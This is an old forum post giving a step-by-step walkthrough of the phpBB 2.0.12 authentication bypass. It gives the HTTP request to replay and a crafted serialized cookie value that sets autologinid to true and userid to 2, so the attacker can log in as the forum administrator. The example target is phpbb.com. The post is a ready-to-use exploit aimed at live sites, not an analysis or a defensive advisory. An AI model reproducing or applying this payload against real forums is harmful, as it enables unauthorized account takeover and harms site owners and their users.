16
General Security Information / phpBB Bug (Again...)
« on: March 25, 2005, 06:30:54 pm »Quote
Ok, now let's get to it. Here is what you will need:
-Preferably a mozilla client, such as Firefox
-LiveHTTP Headers plugin for FireFox Here
Ok, the way this exploit works is because in phpBB's session file, it utilizes a == instead of a === on autocheckid return, allowing you to use a true boolean. I don't know if this was a typo, but to me I think it was a pretty stupid fuck up by phpBB and I am suprised it wasn't found earlier.
Howto:
Go to a forum, for example phpBB.com, open the forum index then go into tools > Live HTTP Headers > then click reload. Once the page is reloaded, go into Live HTTP Headers window, scroll all the way to the top where the first packet is. Then click replay. ScreenShot
In the packet will be thefollowing data
Code:
Host: www.phpbb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: phpbb2support_data=a%3A0%3A%7B%7D
On this line
Cookie: phpbb2support_data=a%3A0%3A%7B%7D
Replace the a%3A0%3A%7B%7D with
Code:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
and then click "reload".
after the page has reloaded you should be logged in a user number 2 , which is usually the administrators id number.
I myself have tried it several times, I have not succeeded in getting an admin status so blah.
Edit: PHPBB 2.0.12 Exploit (That may be why)